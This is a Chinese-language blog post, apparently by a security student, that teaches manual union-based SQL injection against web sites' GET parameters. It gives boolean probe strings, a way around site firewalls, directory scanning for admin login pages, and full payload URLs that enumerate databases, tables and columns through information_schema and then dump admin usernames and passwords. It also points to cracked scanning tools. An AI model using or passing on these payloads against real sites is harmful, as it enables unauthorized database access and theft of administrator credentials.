您好,登錄后才能下訂單哦!
本人是一名***新手,信息安全專業(yè)的學(xué)生一直在學(xué)習(xí)關(guān)于安全方面的理論學(xué)習(xí),主要進(jìn)行的是網(wǎng)站的搭建,但自從接觸了web***之后才發(fā)現(xiàn)自己以前搭建的網(wǎng)站真是漏洞百出,從而也愛(ài)上了***的學(xué)習(xí),今天就和大家分享一下我的學(xué)習(xí)成果,有什么不好的地方歡迎大家提意見(jiàn)!
今天主要是講一講sql注入,sql注入的原理和危害就不多說(shuō)了,大家百度一下就可以了,給大家講一講我的實(shí)踐經(jīng)驗(yàn)。
sql注入的方法(get參數(shù))
說(shuō)復(fù)雜了沒(méi)用其實(shí)就兩種,工具注入與手工注入
(一)選擇網(wǎng)站是否能進(jìn)行sql注入(一般使用火狐瀏覽器比較好——方便)
(1)先查看URL頁(yè)面為http://xxx.com/xxx/id=23 這樣的頁(yè)面或者為偽靜態(tài)的url也可進(jìn)行注入。 ·
(2)在url后輸入
and 1=1返回頁(yè)面正常
and 1=2返回頁(yè)面錯(cuò)誤
or 1=1返回頁(yè)面錯(cuò)誤
or 1=2返回頁(yè)面正常
這樣的網(wǎng)站就有注入漏洞
現(xiàn)在的網(wǎng)站基本都有網(wǎng)站防火墻(帶有防sql注入功能)這時(shí)可用‘工具注入中轉(zhuǎn)生成器’來(lái)重新生成一個(gè)頁(yè)面(注意打開(kāi)這個(gè)頁(yè)面要用iis或小旋風(fēng)),這樣就可以繞過(guò)網(wǎng)站安全狗了。
然后在新生成頁(yè)面進(jìn)行操作。
and 1=1返回頁(yè)面正常
and 1=2返回頁(yè)面錯(cuò)誤
or 1=1返回頁(yè)面錯(cuò)誤
or 1=2返回頁(yè)面正常
這樣就可以進(jìn)行下一步了。
(一)個(gè)人經(jīng)驗(yàn)一般應(yīng)先進(jìn)行目錄的掃描,為什么呢?
因?yàn)橄葢?yīng)該找到網(wǎng)站后臺(tái)的登錄界面,如果連登陸界面都無(wú)法找到,就算知道了管理員的用戶 名密碼又有什么用呢。
可以手工查找,就是猜名稱,一般為admin|login|user等asp、php、aspx、jsp后綴的,這種方 法有點(diǎn)傻,一般用工具進(jìn)行網(wǎng)站遍歷。
掃描工具:工具在附件里都有。我一般先使用御劍的掃描工具,但御劍的歲數(shù)畢竟不小了,也 沒(méi)有后續(xù)的更新,所以有些網(wǎng)站目錄是無(wú)法遍歷出來(lái)的,這是只能用一些牛逼的工具了。工具burpsuite(都說(shuō)是***神器,我也一直在用,功能挺強(qiáng)大的,可以進(jìn)行網(wǎng)站爬行與網(wǎng)站目錄的遍歷)還有就是Acunetix Web Vulnerability Scanner這款軟件也是非常強(qiáng)大的,現(xiàn)在出到10了,網(wǎng)上破解版。具體使用教程請(qǐng)自行百度。
(二)進(jìn)行注入
可用工具啊D、明小子、pangolin穿山甲、sqlmap等工具進(jìn)行注入,今天主要講解手工注入。
手工注入:
1、order by 1.....100判斷表數(shù)
若頁(yè)面返回正常則說(shuō)明這個(gè)數(shù)字小于表數(shù),依次遞加,最好取中進(jìn)行測(cè)試節(jié)省時(shí)間,最后一個(gè) 正確的為表數(shù),如20正常,21不正常,則表數(shù)為20
2、 http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
顯示3,7數(shù)字
3、 將3或7替換為database()、version()、user()、@@version——compile_os
報(bào)基本信息 (1)database():數(shù)據(jù)庫(kù)名-------abc
(2)version():數(shù)據(jù)庫(kù)版本--------5.1.63-community
(3)user():數(shù)據(jù)庫(kù)用戶----------shsjk@localhost
(4)@@version——compile_os:操作系統(tǒng)--------win32
4、表名查詢 http://xxx/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20from information_schema.tables where table_schema=0x616263(此處為數(shù)據(jù)庫(kù)名,可用小葵 轉(zhuǎn)換工具轉(zhuǎn)換為Hex值)
查詢結(jié)果為:wz_jj_admin,wz_jj_article,wz_jj_p_w_upload,wz_jj_class,wz_jj_en_admin,wz_jj_en_article,wz_jj_en_p_w_upload,wz_jj_en_class,wz_jj_en_key,wz_jj_en_links,wz_jj_en_message,wz_jj_key,wz_jj_links,wz_jj_message
5、分析表wz_jj_admin 查找表的列名
http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E
結(jié)果為:uid , ad_username,ad_password,ad_power,ad_intro
6、查找用戶名,密碼http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(ad_username,0x5c,ad_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from wz_jj_admin
7、結(jié)果為:admin admin888 這樣就成功了
這只是簡(jiǎn)單的sql注入,后續(xù)的參數(shù)注入有post注入、cookie注入,請(qǐng)耐心等待!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。